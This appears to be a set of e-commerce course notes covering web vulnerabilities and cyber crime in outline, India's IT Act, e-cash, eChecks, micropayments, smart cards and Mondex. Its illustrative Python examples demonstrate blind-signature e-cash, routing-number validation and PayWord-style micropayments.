There are simple and well-known web application vulnerabilities that could be avoided, yet e-Government websites are still vulnerable to them. One research study found 816 e-Government websites from 212 different countries vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data confidentiality and integrity (an attacker supplies input that the application pastes into a database query, so it is interpreted as part of the query), while XSS is a vulnerability through which attackers inject script into pages served to other users and can steal those users' information, such as session cookies.

Specific security measures such as firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet that try to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. The term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. It is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base (India, 2011):

- 121 million Internet users
- 65 million active Internet users, up 28% from 51 million in 2010
- 50 million users shop online on e-commerce and online shopping sites
- 46+ million social network users
- 346 million mobile users had subscribed to data packages


CYBER LAW

Section 66 (Information Technology Act 2000, text before the 2008 amendment): Hacking

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43: Penalty for damage to computer, computer system, etc.

Whoever, without permission of the owner of the computer:

- secures access;
- downloads, copies or extracts any data, computer database or any information;
- introduces or causes to be introduced any virus or contaminant;
- disrupts or causes disruption;
- denies or causes denial of access to any person;
- provides any assistance to any person to facilitate access;
- charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section 43 (clauses added by the 2008 amendment):

- destroys, deletes or alters any information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means;
- steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

Section 66 (as amended in 2008): Computer related offences

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

(a) any information that is grossly offensive or has menacing character; or
(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or
(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions:

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences:

Section | Offence | Punishment
65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and fine up to 5 lakh rupees
66-A | Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms:

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime. (Section 66A was subsequently struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India, 2015.)


In the third phase the trader approaches the token issuer (the customer's bank); after authenticating the tokens, the issuing bank converts the tokens into electronic funds and transfers them into the trader's account.

Finally, after receiving payment for the respective services, the trader provides the requisite service or product and also notifies the customer that the payment made by the customer has been credited to the trader's account.

E-cash:

- A system that allows a person to pay for goods or services by transmitting a number from one computer to another
- Like the serial numbers on real currency notes, the e-cash numbers are unique
- It is issued by a bank and represents a specified sum of real money
- It is anonymous and reusable

Electronic Cash Security

Complex cryptographic algorithms prevent double spending

Anonymity is preserved unless double spending is attempted

Serial numbers can allow tracing to prevent money laundering
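To make the three points above concrete, here is an added Python example (not code from the original page) of the classic mechanism behind them: the bank issues a coin by signing its serial number blindly, so the bank never sees the serial at withdrawal (anonymity), every coin carries a unique serial, and the bank keeps a list of spent serials so that depositing the same coin twice is detected. It uses a toy RSA key built from two fixed primes and a bare SHA-256 hash with no padding; those parameters, the function names, the Bank class and its result strings are assumptions for the demo and are not a secure parameter choice.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key pair for the issuing bank. Fixed small primes, no padding: demo only,
# NOT a secure parameter choice (assumption for this example).
P = 1_000_000_007
Q = 998_244_353
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # private exponent, known only to the bank


def serial_to_int(serial: bytes) -> int:
    """The coin's unique serial number (chosen by the customer) as the integer that is signed."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def blind(m: int) -> tuple:
    """Customer side: multiply m by r^E for a random r, so the bank sees only m * r^E mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:          # r must be invertible mod N to unblind later
            return (m * pow(r, E, N)) % N, r


def bank_sign_blinded(blinded: int) -> int:
    """Bank side: signs the blinded value (this is where the customer's account is debited).
    The bank learns nothing about which serial it is signing."""
    return pow(blinded, D, N)


def unblind(blinded_sig: int, r: int) -> int:
    """Customer side: remove the blinding factor. (m r^E)^D * r^-1 = m^D mod N,
    i.e. an ordinary RSA signature on m that the bank never saw in the clear."""
    return (blinded_sig * pow(r, -1, N)) % N


def verify(m: int, sig: int) -> bool:
    """Anyone holding the public key (N, E) can check the bank really issued this coin."""
    return pow(sig, E, N) == m


def withdraw_coin(serial: bytes) -> int:
    """Full withdrawal: returns the bank's signature on the serial, obtained blindly."""
    m = serial_to_int(serial)
    blinded, r = blind(m)
    return unblind(bank_sign_blinded(blinded), r)


class Bank:
    """Deposit side: verifies the signature and rejects any serial seen before (double spending)."""

    def __init__(self) -> None:
        self.spent = set()          # serial numbers of every coin already deposited

    def deposit(self, serial: bytes, sig: int) -> str:
        m = serial_to_int(serial)
        if not verify(m, sig):
            return "rejected: bad signature"
        if m in self.spent:
            return "rejected: double spend"
        self.spent.add(m)
        return "accepted"


if __name__ == "__main__":
    bank = Bank()
    coin_serial = b"coin-0001"          # constructed serial number for the demo
    signature = withdraw_coin(coin_serial)
    print(bank.deposit(coin_serial, signature))   # accepted
    print(bank.deposit(coin_serial, signature))   # rejected: double spend
```

This is the online variant: the bank is consulted at every deposit, so a double spend is caught immediately but the spender is not identified. The offline variant the page alludes to, in which a second spend of the same coin reveals the spender's identity while a single spend stays anonymous, needs extra machinery (identity shares embedded in the coin and a cut-and-choose protocol at withdrawal) and is not shown here.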

E-Cash Processing

E-cash security

Security is of extreme importance when handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because no credential such as a card number or password is involved in the payment itself; it is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account the customer must keep in mind Internet security sweeps and theft. Online hacking and cracking can be avoided by using SSL/TLS website security, keeping the website link on the "https" protocol, and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

- We can transfer funds, purchase stocks and use a variety of other services without having to handle physical cash or cheques.
- Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction no matter how high or low it is, but e-cash has a specific limit for additional charges, which is why very low payments are not charged a fee.

Limitations

- However secure the e-cash payment system is, no one is safe against online fraud. In this case the trader may be fraudulent: the trader may take the amount but not provide the services.
- While making the payment it is very important that the Internet connection and power supply stay active. If the payment is in process and the Internet connection fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
- E-cash is not for everyone. Low income segments without computer and Internet access are unable to enjoy the usage of e-cash.

The rise of e-cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make e-cash more complete. In countries such as India, where people were hesitant to use such methods, there has been a tremendous uptake of online payments and the e-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits:

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. A digital signature does not encrypt the data; it is a value computed over the data with the signer's private key that gives the receiver a reliable indication that the information was actually sent by the sender and was not altered in transit (a digital certificate, which the source uses as a synonym, is a different object: it binds a public key to an identity). Digital signatures are used on the Internet to confirm the identity of a customer, much as a handwritten signature would. Because they are difficult to tamper with or imitate and are easily transportable, they are a good way to verify identity. Digital signatures are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses a key pair. With electronic check conversion, the private key is the secret value used to create the digital signature on the eCheck, and the public key is given to anyone who needs to verify that the sender signed the eCheck and that the electronic transfer has not been tampered with.
2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.
3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate your new system with your business management software.

4. QuickBooks Payments, for example, offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button; the vendor reports that businesses using QuickBooks Payments get paid twice as fast because of the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service

1. The payer (customer/bill payer) is prompted to authorize the electronic debit and to enter the bank routing number (ABA) and account number.


2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards the approve/decline result to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearing House (ACH) system. Funds are deposited in approximately 1-3 business days.
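The six steps above, as an added example that is not CyberSource's code or API: a stub processor that performs the validation of step 4 (the genuine ABA routing-number check-digit rule, a format sanity check on the account number, and a lookup against a constructed negative database) and a gateway function that relays the approve/decline decision and queues ACH settlement. The routing numbers are publicly listed ABA numbers used only as checksum-valid samples; the account numbers and the negative-database entry are made up for the example.

```python
from dataclasses import dataclass

# ABA check-digit weights for the nine digits of a routing number.
ABA_WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def valid_routing_number(rtn):
    """A routing number is nine digits whose weighted sum is 0 mod 10."""
    if len(rtn) != 9 or not rtn.isdigit():
        return False
    return sum(w * int(d) for w, d in zip(ABA_WEIGHTS, rtn)) % 10 == 0


def valid_account_number(acct):
    """Account formats differ per bank; only a digits/length sanity check here."""
    return acct.isdigit() and 4 <= len(acct) <= 17


@dataclass
class Decision:
    approved: bool
    reason: str


class StubProcessor:
    """Plays the processor in steps 3-4. negative_db is a constructed set of
    (routing, account) pairs with a returned-item or fraud history."""

    def __init__(self, negative_db):
        self.negative_db = set(negative_db)

    def authorize(self, rtn, acct, amount_cents):
        if not valid_routing_number(rtn):
            return Decision(False, "invalid routing number")
        if not valid_account_number(acct):
            return Decision(False, "invalid account number")
        if amount_cents <= 0:
            return Decision(False, "non-positive amount")
        if (rtn, acct) in self.negative_db:
            return Decision(False, "account on negative database")
        return Decision(True, "approved")


def gateway_authorize(processor, order):
    """Steps 2, 3, 5 and 6: take the order, forward only the bank fields to the
    processor, return its decision, and queue ACH settlement if approved."""
    decision = processor.authorize(
        order["routing_number"], order["account_number"], order["amount_cents"]
    )
    settlement = None
    if decision.approved:
        settlement = {"network": "ACH",
                      "amount_cents": order["amount_cents"],
                      "status": "queued"}       # funds land in 1-3 business days
    return decision, settlement


# Constructed negative-database entry and sample orders (account numbers made up).
NEGATIVE_DB = [("011000015", "9999999999")]
SAMPLE_ORDERS = [
    {"routing_number": "021000021", "account_number": "123456789", "amount_cents": 9500},
    {"routing_number": "021000022", "account_number": "123456789", "amount_cents": 9500},
    {"routing_number": "011000015", "account_number": "9999999999", "amount_cents": 100},
]

if __name__ == "__main__":
    processor = StubProcessor(NEGATIVE_DB)
    for order in SAMPLE_ORDERS:
        decision, settlement = gateway_authorize(processor, order)
        print(order["routing_number"], decision.reason, settlement)
```

The second sample order differs from the first only in its last digit and is rejected by the check-digit rule before the processor ever consults account history, which is the cheap first filter a gateway should apply to mistyped or fabricated bank details.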

Four Different Scenarios of the FSTC E-check System -


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment based) and PayWord (post-payment, credit based)


MICROPAYMENT IS -

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

An alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.
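The aggregation scheme just described, and the post-payment PayWord system named in the examples above, as an added implementation that is not code from the original page: a PayWord-style hash chain in which the user commits once to the root of a chain, each payment reveals the next pre-image and costs the vendor a single hash to verify, and the vendor later redeems one aggregated amount with the broker. It follows the published PayWord design (Rivest and Shamir); as a simplification the broker's signature on the commitment is replaced by an HMAC under a constructed broker key, and the user and vendor identifiers are assumptions.

```python
import hashlib
import hmac
import secrets

# Assumption: stands in for the broker's signing key; a real broker signs.
BROKER_KEY = b"constructed-broker-key-for-example"


def H(data):
    return hashlib.sha256(data).digest()


def make_chain(length):
    """User side: pick random w_n, then w_i = H(w_{i+1}). Returns
    [w_0, w_1, ..., w_n]; w_0 is the root, each later word is worth one unit."""
    words = [secrets.token_bytes(32)]
    for _ in range(length):
        words.append(H(words[-1]))
    words.reverse()
    return words


def broker_commitment(user_id, vendor_id, root):
    """Broker certifies that user_id committed chain `root` to vendor_id."""
    msg = b"|".join([user_id, vendor_id, root.hex().encode()])
    return msg, hmac.new(BROKER_KEY, msg, hashlib.sha256).digest()


class Vendor:
    """Accepts payments offline; stores only (root, last index, last word)."""

    def __init__(self, vendor_id):
        self.vendor_id = vendor_id
        self.state = {}

    def accept_commitment(self, user_id, msg, tag):
        expected = hmac.new(BROKER_KEY, msg, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False                      # not certified by the broker
        uid, vid, root_hex = msg.split(b"|")
        if uid != user_id or vid != self.vendor_id:
            return False                      # commitment meant for someone else
        root = bytes.fromhex(root_hex.decode())
        self.state[user_id] = (root, 0, root)
        return True

    def accept_payment(self, user_id, index, word):
        """Payment (w_i, i) is valid iff hashing w_i (i - last) times gives the
        last accepted word. Paying index 4 after 1 transfers 3 units at once."""
        if user_id not in self.state:
            return False
        root, last_index, last_word = self.state[user_id]
        if index <= last_index:
            return False                      # replay or out of order
        x = word
        for _ in range(index - last_index):
            x = H(x)
        if x != last_word:
            return False                      # forged: not on the chain
        self.state[user_id] = (root, index, word)
        return True

    def redeem(self, user_id):
        """One message to the broker covers the whole session."""
        return self.state[user_id]


def broker_redeem(root, index, word):
    """Broker credits the vendor `index` units if H^index(word) == root."""
    x = word
    for _ in range(index):
        x = H(x)
    return index if x == root else 0


if __name__ == "__main__":
    chain = make_chain(10)                         # 10 one-unit payments
    msg, tag = broker_commitment(b"alice", b"news-site", chain[0])
    vendor = Vendor(b"news-site")
    print("commitment accepted:", vendor.accept_commitment(b"alice", msg, tag))
    print("pay 1 unit:", vendor.accept_payment(b"alice", 1, chain[1]))
    print("pay 3 more:", vendor.accept_payment(b"alice", 4, chain[4]))
    print("replay:", vendor.accept_payment(b"alice", 4, chain[4]))
    root, idx, last = vendor.redeem(b"alice")
    print("broker credits vendor with", broker_redeem(root, idx, last), "units")
```

The vendor never contacts the broker during a session and verifies each payment with one hash, which is what makes per-cent pricing affordable; a replayed or fabricated word fails because it does not hash back to the last accepted word, and the user cannot spend the same word at a second vendor because the commitment names the vendor.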

Advantages and risks -

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer's side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small amounts, security does not have the highest priority; much more important than security is trust. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. (Low value per transaction reduces the incentive to attack any single payment, but a scheme still has to stop double spending and forged credit at scale, since an attacker who can mint or replay one micropayment can do so millions of times.) Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options -

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and choose a module that suits their needs. The customer then gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: payment via the mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN (transaction number) in order to confirm payment.

Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: payment by credit card. The customer enters his or her credit card data and confirms the transaction. The transaction can optionally be carried out with the 3-D Secure method (Verified by Visa and MasterCard SecureCode).

Direct debit: payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal accounts and is intended for transactions of less than US$12. As of 2013 the service is offered in select currencies only.

Micropayment Uses -

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card, or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card

Standard credit card-sized with microchip embedded on it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32,000 bytes (the figure on the original slide; current cards store considerably more)

Newer smart cards have math co-processors


Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards -


Why Smart Cards -

Improve the convenience and security of any transaction

Provide tamper-resistant storage of user and account identity

Provide vital components of system security

Protect against a wide range of security threats

Advantages -

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications -

Ticketless travel

Seoul bus system 4M cards 1B transactions since 1996

Planned for the SF Bay Area system

Authentication ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Key features:

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet or telephone networks etc

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER -

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT -

Reliable offline payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION -

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy -

Principles protected

o Limits for collecting personal information

o limits for using disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using disclosing and keeping personal information

o safeguard deposits

o to re-imburse for non-performance

Keeping personal information accurate

o load and unload are online

o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information

o firewalls in MULTOS between applications - ITSEC E6 designation

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

